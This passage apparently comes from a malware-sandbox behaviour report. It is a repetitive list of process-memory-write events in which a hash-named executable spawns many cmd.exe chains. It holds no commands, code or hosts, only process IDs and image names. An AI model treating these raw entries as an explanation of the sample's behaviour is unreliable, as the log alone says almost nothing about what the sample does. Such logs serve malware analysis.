PID 1332 wrote to memory of 436 1332 cmd.exe 383 PID 1332 wrote to memory of 232 1332 cmd.exe 384 PID 1332 wrote to memory of 232 1332 cmd.exe 384 PID 1332 wrote to memory of 232 1332 cmd.exe 384 PID 1332 wrote to memory of 232 1332 cmd.exe 384 PID 1332 wrote to memory of 1584 1332 cmd.exe 385 PID 1332 wrote to memory of 1584 1332 cmd.exe 385 PID 1332 wrote to memory of 1584 1332 cmd.exe 385 PID 1332 wrote to memory of 1584 1332 cmd.exe 385 PID 1584 wrote to memory of 1176 1584 cmd.exe 386 PID 1584 wrote to memory of 1176 1584 cmd.exe 386 PID 1584 wrote to memory of 1176 1584 cmd.exe 386 PID 1584 wrote to memory of 1176 1584 cmd.exe 386 PID 1332 wrote to memory of 220 1332 cmd.exe 387 PID 1332 wrote to memory of 220 1332 cmd.exe 387 PID 1332 wrote to memory of 220 1332 cmd.exe 387 PID 1332 wrote to memory of 220 1332 cmd.exe 387 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 388 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 388 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 388 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 388 PID 1828 wrote to memory of 952 1828 cmd.exe 390 PID 1828 wrote to memory of 952 1828 cmd.exe 390 PID 1828 wrote to memory of 952 1828 cmd.exe 390 PID 1828 wrote to memory of 952 1828 cmd.exe 390 PID 1828 wrote to memory of 472 1828 cmd.exe 391 PID 1828 wrote to memory of 472 1828 cmd.exe 391 PID 1828 wrote to memory of 472 1828 cmd.exe 391 PID 1828 wrote to memory of 472 1828 cmd.exe 391 PID 1828 wrote to memory of 1776 1828 cmd.exe 392 PID 1828 wrote to memory of 1776 1828 cmd.exe 392 PID 1828 wrote to memory of 1776 1828 cmd.exe 392 PID 1828 wrote to memory of 1776 1828 cmd.exe 392 PID 1776 wrote to memory of 1112 1776 cmd.exe 393 PID 1776 wrote to memory of 1112 1776 cmd.exe 393 PID 1776 wrote to memory of 1112 1776 cmd.exe 393 PID 1776 wrote to memory of 1112 1776 cmd.exe 393 PID 1828 wrote to memory of 1136 1828 cmd.exe 394 PID 1828 wrote to memory of 1136 1828 cmd.exe 394 PID 1828 wrote to memory of 1136 1828 cmd.exe 394 PID 1828 wrote to memory of 1136 1828 cmd.exe 394 PID 616 wrote to memory of 1808 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 395 PID 616 wrote to memory of 1808 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 395 PID 616 wrote to memory of 1808 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 395 PID 616 wrote to memory of 1808 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 395 PID 1808 wrote to memory of 1980 1808 cmd.exe 397 PID 1808 wrote to memory of 1980 1808 cmd.exe 397 PID 1808 wrote to memory of 1980 1808 cmd.exe 397 PID 1808 wrote to memory of 1980 1808 cmd.exe 397 PID 1808 wrote to memory of 1996 1808 cmd.exe 398 PID 1808 wrote to memory of 1996 1808 cmd.exe 398 PID 1808 wrote to memory of 1996 1808 cmd.exe 398 PID 1808 wrote to memory of 1996 1808 cmd.exe 398 PID 1808 wrote to memory of 1784 1808 cmd.exe 399 PID 1808 wrote to memory of 1784 1808 cmd.exe 399 PID 1808 wrote to memory of 1784 1808 cmd.exe 399 PID 1808 wrote to memory of 1784 1808 cmd.exe 399 PID 1784 wrote to memory of 1796 1784 cmd.exe 400 PID 1784 wrote to memory of 1796 1784 cmd.exe 400 PID 1784 wrote to memory of 1796 1784 cmd.exe 400 PID 1784 wrote to memory of 1796 1784 cmd.exe 400 PID 1808 wrote to memory of 1228 1808 cmd.exe 401 PID 1808 wrote to memory of 1228 1808 cmd.exe 401 PID 1808 wrote to memory of 1228 1808 cmd.exe 401 PID 1808 wrote to memory of 1228 1808 cmd.exe 401 PID 616 wrote to memory of 1152 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 402 PID 616 wrote to memory of 1152 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 402 PID 616 wrote to memory of 1152 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 402 PID 616 wrote to memory of 1152 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 402 PID 1152 wrote to memory of 888 1152 cmd.exe 404 PID 1152 wrote to memory of 888 1152 cmd.exe 404 PID 1152 wrote to memory of 888 1152 cmd.exe 404 PID 1152 wrote to memory of 888 1152 cmd.exe 404 PID 1152 wrote to memory of 1584 1152 cmd.exe 405 PID 1152 wrote to memory of 1584 1152 cmd.exe 405 PID 1152 wrote to memory of 1584 1152 cmd.exe 405 PID 1152 wrote to memory of 1584 1152 cmd.exe 405 PID 1152 wrote to memory of 224 1152 cmd.exe 406 PID 1152 wrote to memory of 224 1152 cmd.exe 406 PID 1152 wrote to memory of 224 1152 cmd.exe 406 PID 1152 wrote to memory of 224 1152 cmd.exe 406 PID 224 wrote to memory of 1488 224 cmd.exe 407 PID 224 wrote to memory of 1488 224 cmd.exe 407 PID 224 wrote to memory of 1488 224 cmd.exe 407 PID 224 wrote to memory of 1488 224 cmd.exe 407 PID 1152 wrote to memory of 1120 1152 cmd.exe 408 PID 1152 wrote to memory of 1120 1152 cmd.exe 408 PID 1152 wrote to memory of 1120 1152 cmd.exe 408 PID 1152 wrote to memory of 1120 1152 cmd.exe 408 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 409 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 409 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 409 PID 616 wrote to memory of 952 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 409 PID 952 wrote to memory of 360 952 cmd.exe 411 PID 952 wrote to memory of 360 952 cmd.exe 411 PID 952 wrote to memory of 360 952 cmd.exe 411 PID 952 wrote to memory of 360 952 cmd.exe 411 PID 952 wrote to memory of 1776 952 cmd.exe 412 PID 952 wrote to memory of 1776 952 cmd.exe 412 PID 952 wrote to memory of 1776 952 cmd.exe 412 PID 952 wrote to memory of 1776 952 cmd.exe 412 PID 952 wrote to memory of 672 952 cmd.exe 413 PID 952 wrote to memory of 672 952 cmd.exe 413 PID 952 wrote to memory of 672 952 cmd.exe 413 PID 952 wrote to memory of 672 952 cmd.exe 413 PID 672 wrote to memory of 884 672 cmd.exe 414 PID 672 wrote to memory of 884 672 cmd.exe 414 PID 672 wrote to memory of 884 672 cmd.exe 414 PID 672 wrote to memory of 884 672 cmd.exe 414 PID 952 wrote to memory of 948 952 cmd.exe 415 PID 952 wrote to memory of 948 952 cmd.exe 415 PID 952 wrote to memory of 948 952 cmd.exe 415 PID 952 wrote to memory of 948 952 cmd.exe 415 PID 616 wrote to memory of 1980 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 416 PID 616 wrote to memory of 1980 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 416 PID 616 wrote to memory of 1980 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 416 PID 616 wrote to memory of 1980 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 416 PID 1980 wrote to memory of 1216 1980 cmd.exe 418 PID 1980 wrote to memory of 1216 1980 cmd.exe 418 PID 1980 wrote to memory of 1216 1980 cmd.exe 418 PID 1980 wrote to memory of 1216 1980 cmd.exe 418 PID 1980 wrote to memory of 1784 1980 cmd.exe 419 PID 1980 wrote to memory of 1784 1980 cmd.exe 419 PID 1980 wrote to memory of 1784 1980 cmd.exe 419 PID 1980 wrote to memory of 1784 1980 cmd.exe 419 PID 1980 wrote to memory of 228 1980 cmd.exe 420 PID 1980 wrote to memory of 228 1980 cmd.exe 420 PID 1980 wrote to memory of 228 1980 cmd.exe 420 PID 1980 wrote to memory of 228 1980 cmd.exe 420 PID 228 wrote to memory of 1232 228 cmd.exe 421 PID 228 wrote to memory of 1232 228 cmd.exe 421 PID 228 wrote to memory of 1232 228 cmd.exe 421 PID 228 wrote to memory of 1232 228 cmd.exe 421 PID 1980 wrote to memory of 964 1980 cmd.exe 422 PID 1980 wrote to memory of 964 1980 cmd.exe 422 PID 1980 wrote to memory of 964 1980 cmd.exe 422 PID 1980 wrote to memory of 964 1980 cmd.exe 422 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 423 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 423 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 423 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 423 PID 888 wrote to memory of 1332 888 cmd.exe 425 PID 888 wrote to memory of 1332 888 cmd.exe 425 PID 888 wrote to memory of 1332 888 cmd.exe 425 PID 888 wrote to memory of 1332 888 cmd.exe 425 PID 888 wrote to memory of 1516 888 cmd.exe 426 PID 888 wrote to memory of 1516 888 cmd.exe 426 PID 888 wrote to memory of 1516 888 cmd.exe 426 PID 888 wrote to memory of 1516 888 cmd.exe 426 PID 888 wrote to memory of 1256 888 cmd.exe 427 PID 888 wrote to memory of 1256 888 cmd.exe 427 PID 888 wrote to memory of 1256 888 cmd.exe 427 PID 888 wrote to memory of 1256 888 cmd.exe 427 PID 1256 wrote to memory of 1120 1256 cmd.exe 428 PID 1256 wrote to memory of 1120 1256 cmd.exe 428 PID 1256 wrote to memory of 1120 1256 cmd.exe 428 PID 1256 wrote to memory of 1120 1256 cmd.exe 428 PID 888 wrote to memory of 1152 888 cmd.exe 429 PID 888 wrote to memory of 1152 888 cmd.exe 429 PID 888 wrote to memory of 1152 888 cmd.exe 429 PID 888 wrote to memory of 1152 888 cmd.exe 429 PID 616 wrote to memory of 660 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 430 PID 616 wrote to memory of 660 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 430 PID 616 wrote to memory of 660 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 430 PID 616 wrote to memory of 660 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 430 PID 660 wrote to memory of 1136 660 cmd.exe 432 PID 660 wrote to memory of 1136 660 cmd.exe 432 PID 660 wrote to memory of 1136 660 cmd.exe 432 PID 660 wrote to memory of 1136 660 cmd.exe 432 PID 660 wrote to memory of 1432 660 cmd.exe 433 PID 660 wrote to memory of 1432 660 cmd.exe 433 PID 660 wrote to memory of 1432 660 cmd.exe 433 PID 660 wrote to memory of 1432 660 cmd.exe 433 PID 660 wrote to memory of 672 660 cmd.exe 434 PID 660 wrote to memory of 672 660 cmd.exe 434 PID 660 wrote to memory of 672 660 cmd.exe 434 PID 660 wrote to memory of 672 660 cmd.exe 434 PID 672 wrote to memory of 1408 672 cmd.exe 435 PID 672 wrote to memory of 1408 672 cmd.exe 435 PID 672 wrote to memory of 1408 672 cmd.exe 435 PID 672 wrote to memory of 1408 672 cmd.exe 435 PID 660 wrote to memory of 952 660 cmd.exe 436 PID 660 wrote to memory of 952 660 cmd.exe 436 PID 660 wrote to memory of 952 660 cmd.exe 436 PID 660 wrote to memory of 952 660 cmd.exe 436 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 437 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 437 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 437 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 437 PID 1796 wrote to memory of 1228 1796 cmd.exe 439 PID 1796 wrote to memory of 1228 1796 cmd.exe 439 PID 1796 wrote to memory of 1228 1796 cmd.exe 439 PID 1796 wrote to memory of 1228 1796 cmd.exe 439 PID 1796 wrote to memory of 1844 1796 cmd.exe 440 PID 1796 wrote to memory of 1844 1796 cmd.exe 440 PID 1796 wrote to memory of 1844 1796 cmd.exe 440 PID 1796 wrote to memory of 1844 1796 cmd.exe 440 PID 1796 wrote to memory of 228 1796 cmd.exe 441 PID 1796 wrote to memory of 228 1796 cmd.exe 441 PID 1796 wrote to memory of 228 1796 cmd.exe 441 PID 1796 wrote to memory of 228 1796 cmd.exe 441 PID 228 wrote to memory of 232 228 cmd.exe 442 PID 228 wrote to memory of 232 228 cmd.exe 442 PID 228 wrote to memory of 232 228 cmd.exe 442 PID 228 wrote to memory of 232 228 cmd.exe 442 PID 1796 wrote to memory of 1980 1796 cmd.exe 443 PID 1796 wrote to memory of 1980 1796 cmd.exe 443 PID 1796 wrote to memory of 1980 1796 cmd.exe 443 PID 1796 wrote to memory of 1980 1796 cmd.exe 443 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 444 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 444 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 444 PID 616 wrote to memory of 972 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 444 PID 972 wrote to memory of 1020 972 cmd.exe 446 PID 972 wrote to memory of 1020 972 cmd.exe 446 PID 972 wrote to memory of 1020 972 cmd.exe 446 PID 972 wrote to memory of 1020 972 cmd.exe 446 PID 972 wrote to memory of 2040 972 cmd.exe 447 PID 972 wrote to memory of 2040 972 cmd.exe 447 PID 972 wrote to memory of 2040 972 cmd.exe 447 PID 972 wrote to memory of 2040 972 cmd.exe 447 PID 972 wrote to memory of 1120 972 cmd.exe 448 PID 972 wrote to memory of 1120 972 cmd.exe 448 PID 972 wrote to memory of 1120 972 cmd.exe 448 PID 972 wrote to memory of 1120 972 cmd.exe 448 PID 1120 wrote to memory of 1936 1120 cmd.exe 449 PID 1120 wrote to memory of 1936 1120 cmd.exe 449 PID 1120 wrote to memory of 1936 1120 cmd.exe 449 PID 1120 wrote to memory of 1936 1120 cmd.exe 449 PID 972 wrote to memory of 1832 972 cmd.exe 450 PID 972 wrote to memory of 1832 972 cmd.exe 450 PID 972 wrote to memory of 1832 972 cmd.exe 450 PID 972 wrote to memory of 1832 972 cmd.exe 450 PID 616 wrote to memory of 528 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 451 PID 616 wrote to memory of 528 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 451 PID 616 wrote to memory of 528 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 451 PID 616 wrote to memory of 528 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 451 PID 528 wrote to memory of 884 528 cmd.exe 453 PID 528 wrote to memory of 884 528 cmd.exe 453 PID 528 wrote to memory of 884 528 cmd.exe 453 PID 528 wrote to memory of 884 528 cmd.exe 453 PID 528 wrote to memory of 1088 528 cmd.exe 454 PID 528 wrote to memory of 1088 528 cmd.exe 454 PID 528 wrote to memory of 1088 528 cmd.exe 454 PID 528 wrote to memory of 1088 528 cmd.exe 454 PID 528 wrote to memory of 1948 528 cmd.exe 455 PID 528 wrote to memory of 1948 528 cmd.exe 455 PID 528 wrote to memory of 1948 528 cmd.exe 455 PID 528 wrote to memory of 1948 528 cmd.exe 455 PID 1948 wrote to memory of 1824 1948 cmd.exe 456 PID 1948 wrote to memory of 1824 1948 cmd.exe 456 PID 1948 wrote to memory of 1824 1948 cmd.exe 456 PID 1948 wrote to memory of 1824 1948 cmd.exe 456 PID 528 wrote to memory of 920 528 cmd.exe 457 PID 528 wrote to memory of 920 528 cmd.exe 457 PID 528 wrote to memory of 920 528 cmd.exe 457 PID 528 wrote to memory of 920 528 cmd.exe 457 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 458 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 458 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 458 PID 616 wrote to memory of 1960 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 458 PID 1960 wrote to memory of 1844 1960 cmd.exe 460 PID 1960 wrote to memory of 1844 1960 cmd.exe 460 PID 1960 wrote to memory of 1844 1960 cmd.exe 460 PID 1960 wrote to memory of 1844 1960 cmd.exe 460 PID 1960 wrote to memory of 796 1960 cmd.exe 461 PID 1960 wrote to memory of 796 1960 cmd.exe 461 PID 1960 wrote to memory of 796 1960 cmd.exe 461 PID 1960 wrote to memory of 796 1960 cmd.exe 461 PID 1960 wrote to memory of 228 1960 cmd.exe 462 PID 1960 wrote to memory of 228 1960 cmd.exe 462 PID 1960 wrote to memory of 228 1960 cmd.exe 462 PID 1960 wrote to memory of 228 1960 cmd.exe 462 PID 228 wrote to memory of 1584 228 cmd.exe 463 PID 228 wrote to memory of 1584 228 cmd.exe 463 PID 228 wrote to memory of 1584 228 cmd.exe 463 PID 228 wrote to memory of 1584 228 cmd.exe 463 PID 1960 wrote to memory of 1796 1960 cmd.exe 464 PID 1960 wrote to memory of 1796 1960 cmd.exe 464 PID 1960 wrote to memory of 1796 1960 cmd.exe 464 PID 1960 wrote to memory of 1796 1960 cmd.exe 464 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 465 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 465 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 465 PID 616 wrote to memory of 1684 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 465 PID 1684 wrote to memory of 1256 1684 cmd.exe 467 PID 1684 wrote to memory of 1256 1684 cmd.exe 467 PID 1684 wrote to memory of 1256 1684 cmd.exe 467 PID 1684 wrote to memory of 1256 1684 cmd.exe 467 PID 1684 wrote to memory of 1112 1684 cmd.exe 468 PID 1684 wrote to memory of 1112 1684 cmd.exe 468 PID 1684 wrote to memory of 1112 1684 cmd.exe 468 PID 1684 wrote to memory of 1112 1684 cmd.exe 468 PID 1684 wrote to memory of 908 1684 cmd.exe 469 PID 1684 wrote to memory of 908 1684 cmd.exe 469 PID 1684 wrote to memory of 908 1684 cmd.exe 469 PID 1684 wrote to memory of 908 1684 cmd.exe 469 PID 908 wrote to memory of 1832 908 cmd.exe 470 PID 908 wrote to memory of 1832 908 cmd.exe 470 PID 908 wrote to memory of 1832 908 cmd.exe 470 PID 908 wrote to memory of 1832 908 cmd.exe 470 PID 1684 wrote to memory of 1332 1684 cmd.exe 471 PID 1684 wrote to memory of 1332 1684 cmd.exe 471 PID 1684 wrote to memory of 1332 1684 cmd.exe 471 PID 1684 wrote to memory of 1332 1684 cmd.exe 471 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 472 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 472 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 472 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 472 PID 948 wrote to memory of 472 948 cmd.exe 474 PID 948 wrote to memory of 472 948 cmd.exe 474 PID 948 wrote to memory of 472 948 cmd.exe 474 PID 948 wrote to memory of 472 948 cmd.exe 474 PID 948 wrote to memory of 1460 948 cmd.exe 475 PID 948 wrote to memory of 1460 948 cmd.exe 475 PID 948 wrote to memory of 1460 948 cmd.exe 475 PID 948 wrote to memory of 1460 948 cmd.exe 475 PID 948 wrote to memory of 360 948 cmd.exe 476 PID 948 wrote to memory of 360 948 cmd.exe 476 PID 948 wrote to memory of 360 948 cmd.exe 476 PID 948 wrote to memory of 360 948 cmd.exe 476 PID 360 wrote to memory of 660 360 cmd.exe 477 PID 360 wrote to memory of 660 360 cmd.exe 477 PID 360 wrote to memory of 660 360 cmd.exe 477 PID 360 wrote to memory of 660 360 cmd.exe 477 PID 948 wrote to memory of 1136 948 cmd.exe 478 PID 948 wrote to memory of 1136 948 cmd.exe 478 PID 948 wrote to memory of 1136 948 cmd.exe 478 PID 948 wrote to memory of 1136 948 cmd.exe 478 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 479 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 479 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 479 PID 616 wrote to memory of 232 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 479 PID 232 wrote to memory of 1472 232 cmd.exe 481 PID 232 wrote to memory of 1472 232 cmd.exe 481 PID 232 wrote to memory of 1472 232 cmd.exe 481 PID 232 wrote to memory of 1472 232 cmd.exe 481 PID 232 wrote to memory of 228 232 cmd.exe 482 PID 232 wrote to memory of 228 232 cmd.exe 482 PID 232 wrote to memory of 228 232 cmd.exe 482 PID 232 wrote to memory of 228 232 cmd.exe 482 PID 232 wrote to memory of 1784 232 cmd.exe 483 PID 232 wrote to memory of 1784 232 cmd.exe 483 PID 232 wrote to memory of 1784 232 cmd.exe 483 PID 232 wrote to memory of 1784 232 cmd.exe 483 PID 1784 wrote to memory of 1232 1784 cmd.exe 484 PID 1784 wrote to memory of 1232 1784 cmd.exe 484 PID 1784 wrote to memory of 1232 1784 cmd.exe 484 PID 1784 wrote to memory of 1232 1784 cmd.exe 484 PID 232 wrote to memory of 436 232 cmd.exe 485 PID 232 wrote to memory of 436 232 cmd.exe 485 PID 232 wrote to memory of 436 232 cmd.exe 485 PID 232 wrote to memory of 436 232 cmd.exe 485 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 486 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 486 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 486 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 486 PID 1936 wrote to memory of 224 1936 cmd.exe 488 PID 1936 wrote to memory of 224 1936 cmd.exe 488 PID 1936 wrote to memory of 224 1936 cmd.exe 488 PID 1936 wrote to memory of 224 1936 cmd.exe 488 PID 1936 wrote to memory of 908 1936 cmd.exe 489 PID 1936 wrote to memory of 908 1936 cmd.exe 489 PID 1936 wrote to memory of 908 1936 cmd.exe 489 PID 1936 wrote to memory of 908 1936 cmd.exe 489 PID 1936 wrote to memory of 624 1936 cmd.exe 490 PID 1936 wrote to memory of 624 1936 cmd.exe 490 PID 1936 wrote to memory of 624 1936 cmd.exe 490 PID 1936 wrote to memory of 624 1936 cmd.exe 490 PID 624 wrote to memory of 2040 624 cmd.exe 491 PID 624 wrote to memory of 2040 624 cmd.exe 491 PID 624 wrote to memory of 2040 624 cmd.exe 491 PID 624 wrote to memory of 2040 624 cmd.exe 491 PID 1936 wrote to memory of 884 1936 cmd.exe 492 PID 1936 wrote to memory of 884 1936 cmd.exe 492 PID 1936 wrote to memory of 884 1936 cmd.exe 492 PID 1936 wrote to memory of 884 1936 cmd.exe 492 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 493 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 493 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 493 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 493 PID 472 wrote to memory of 1944 472 cmd.exe 495 PID 472 wrote to memory of 1944 472 cmd.exe 495 PID 472 wrote to memory of 1944 472 cmd.exe 495 PID 472 wrote to memory of 1944 472 cmd.exe 495 PID 472 wrote to memory of 660 472 cmd.exe 496 PID 472 wrote to memory of 660 472 cmd.exe 496 PID 472 wrote to memory of 660 472 cmd.exe 496 PID 472 wrote to memory of 660 472 cmd.exe 496 PID 472 wrote to memory of 976 472 cmd.exe 497 PID 472 wrote to memory of 976 472 cmd.exe 497 PID 472 wrote to memory of 976 472 cmd.exe 497 PID 472 wrote to memory of 976 472 cmd.exe 497 PID 976 wrote to memory of 1136 976 cmd.exe 498 PID 976 wrote to memory of 1136 976 cmd.exe 498 PID 976 wrote to memory of 1136 976 cmd.exe 498 PID 976 wrote to memory of 1136 976 cmd.exe 498 PID 472 wrote to memory of 1076 472 cmd.exe 499 PID 472 wrote to memory of 1076 472 cmd.exe 499 PID 472 wrote to memory of 1076 472 cmd.exe 499 PID 472 wrote to memory of 1076 472 cmd.exe 499 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 500 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 500 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 500 PID 616 wrote to memory of 680 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 500 PID 680 wrote to memory of 1808 680 cmd.exe 502 PID 680 wrote to memory of 1808 680 cmd.exe 502 PID 680 wrote to memory of 1808 680 cmd.exe 502 PID 680 wrote to memory of 1808 680 cmd.exe 502 PID 680 wrote to memory of 1232 680 cmd.exe 503 PID 680 wrote to memory of 1232 680 cmd.exe 503 PID 680 wrote to memory of 1232 680 cmd.exe 503 PID 680 wrote to memory of 1232 680 cmd.exe 503 PID 680 wrote to memory of 1152 680 cmd.exe 504 PID 680 wrote to memory of 1152 680 cmd.exe 504 PID 680 wrote to memory of 1152 680 cmd.exe 504 PID 680 wrote to memory of 1152 680 cmd.exe 504 PID 1152 wrote to memory of 1556 1152 cmd.exe 505 PID 1152 wrote to memory of 1556 1152 cmd.exe 505 PID 1152 wrote to memory of 1556 1152 cmd.exe 505 PID 1152 wrote to memory of 1556 1152 cmd.exe 505 PID 680 wrote to memory of 1176 680 cmd.exe 506 PID 680 wrote to memory of 1176 680 cmd.exe 506 PID 680 wrote to memory of 1176 680 cmd.exe 506 PID 680 wrote to memory of 1176 680 cmd.exe 506 PID 616 wrote to memory of 220 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 507 PID 616 wrote to memory of 220 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 507 PID 616 wrote to memory of 220 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 507 PID 616 wrote to memory of 220 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 507 PID 220 wrote to memory of 1560 220 cmd.exe 509 PID 220 wrote to memory of 1560 220 cmd.exe 509 PID 220 wrote to memory of 1560 220 cmd.exe 509 PID 220 wrote to memory of 1560 220 cmd.exe 509 PID 220 wrote to memory of 2040 220 cmd.exe 510 PID 220 wrote to memory of 2040 220 cmd.exe 510 PID 220 wrote to memory of 2040 220 cmd.exe 510 PID 220 wrote to memory of 2040 220 cmd.exe 510 